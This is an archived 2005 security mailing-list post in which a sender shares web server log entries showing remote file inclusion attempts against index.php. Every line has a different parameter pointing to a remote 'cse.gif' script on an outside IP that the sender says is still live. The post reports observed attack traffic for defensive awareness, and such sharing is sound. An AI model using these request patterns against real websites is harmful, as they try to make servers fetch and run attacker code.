lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <9b13f6c1050729091721fc7bf0@mail.gmail.com> Date: Fri Jul 29 17:17:16 2005 From: infsec at gmail.com (Willem Koenings) Subject: PHP Command/Safemode Exploit hi, looks like CSE exploit is circulating again... found several queries today from server log anyone confirms? "GET /index.php?page=http://213.202.214.198/cse.gif? HTTP/1.1" 404 1035 "-" "Python-urllib/2.4" "GET /index.php?id=http://213.202.214.198/cse.gif? HTTP/1.1" 404 1035 "-" "Python-urllib/2.4" "GET /index.php?action=http://213.202.214.198/cse.gif? HTTP/1.1" 404 1035 "-" "Python-urllib/2.4" "GET /index.php?include=http://213.202.214.198/cse.gif? HTTP/1.1" 404 1035 "-" "Python-urllib/2.4" "GET /index.php?site=http://213.202.214.198/cse.gif? HTTP/1.1" 404 1035 "-" "Python-urllib/2.4" this url is hot and working right now so handle with care... W.
Powered by blists - more mailing lists